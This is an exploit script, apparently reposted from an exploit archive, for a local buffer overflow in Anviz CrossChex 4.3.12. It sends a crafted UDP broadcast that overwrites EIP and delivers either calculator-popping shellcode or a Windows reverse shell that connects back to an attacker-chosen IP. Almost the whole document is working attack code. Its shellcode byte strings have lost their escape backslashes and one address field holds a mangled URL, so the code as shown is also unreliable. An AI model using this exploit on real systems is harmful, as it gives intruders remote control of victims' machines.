Anviz CrossChex 4.3.12 – Local Buffer Overflow

– Exploit Details

# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: //www.anviz.com/
# Software Link: //www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: //www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html

import socket
import time
import sys
import binascii

# Scapy for the broadcast packet with custom sport
from scapy.all import Raw,IP,Dot1Q,UDP,Ether
import scapy.all

# shellcode working calc.exe
calculator_payload = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
calculator_payload += b"x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
calculator_payload += b"x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
calculator_payload += b"x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
calculator_payload += b"x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
calculator_payload += b"xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
calculator_payload += b"xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
calculator_payload += b"xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
calculator_payload += b"x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
calculator_payload += b"x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
calculator_payload += b"x5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00"
calculator_payload += b"x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
calculator_payload += b"xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0a"
calculator_payload += b"x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
calculator_payload += b"xffxd5x63x61x6cx63x2ex65x78x65x00"

# shellcode windows x86 reverse_shell
shell_payload_1 = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shell_payload_1 += b"x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shell_payload_1 += b"x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shell_payload_1 += b"x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shell_payload_1 += b"x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shell_payload_1 += b"xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shell_payload_1 += b"xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shell_payload_1 += b"xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shell_payload_1 += b"x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shell_payload_1 += b"x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shell_payload_1 += b"x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
shell_payload_1 += b"x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
shell_payload_1 += b"x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
shell_payload_1 += b"xffxd5x50x50x50x50x40x50x40x50x68xeax0f"
shell_payload_1 += b"xdfxe0xffxd5x97x6ax05x68"

# shellcode windows x86 reverse_shell (part_2)
shell_payload_2 = b"x68x02x00x01xbdx89xe6x6ax10x56x57x68x99xa5"
shell_payload_2 += b"x74x61xffxd5x85xc0x74x0cxffx4ex08x75xec"
shell_payload_2 += b"x68xf0xb5xa2x56xffxd5x68x63x6dx64x00x89"
shell_payload_2 += b"xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66"
shell_payload_2 += b"xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44"
shell_payload_2 += b"x54x50x56x56x56x46x56x4ex56x56x53x56x68"
shell_payload_2 += b"x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30"
shell_payload_2 += b"x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68"
shell_payload_2 += b"xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0"
shell_payload_2 += b"x75x05xbbx47x13x72x6fx6ax00x53xffxd5"

def ipToShellcode(ip):
  a = ip.split('.')
  b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
  b = b.replace("0x","")
  return binascii.unhexlify(b)

# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
    request = b"A"*77 # Original payload substitute
    request += b"B"*184
    request += b"x07x18x42x00" # EIP - 00421807 crosscheck_standard.exe
    request += b"A"*4
    # 269 bytes

    if len(sys.argv) > 2:
      request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
      request = request + calculator_payload

    scapy.all.sendp( Ether(src="//www.exploit-db.com/00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request),  iface=sys.argv[1] )

def setFuzzUDPServer(ip='', port=5050, timeout=150):
    try :
    	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
    	print('[!] Failed to create server socket')

    try:
    	s.bind(('', port))
    except:
    	print('[*] Server socket bind failed')
    	sys.exit()

    print('[*] Waiting for crosschex')
    s.settimeout(timeout)
    timeout = time.time() + timeout
    responses = []

    while True:
        if time.time() > timeout:
            break
        try:
            response = s.recvfrom(1024)
            print(response)
            responses.append(response)
            sendFuzzingUDPBroadcast(ip=ip)
            response = s.recvfrom(1024)            
        except socket.timeout:
            print("[!] Error with UDP server")

    s.close()
    return responses

nargs = len(sys.argv)

if nargs < 2:
  print("[*] Usage: python3 %s  [[]ntif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
  sys.exit(0)

setFuzzUDPServer()
            

.




TAGS
Share This

COMMENTS

Wordpress (0)
Disqus ( )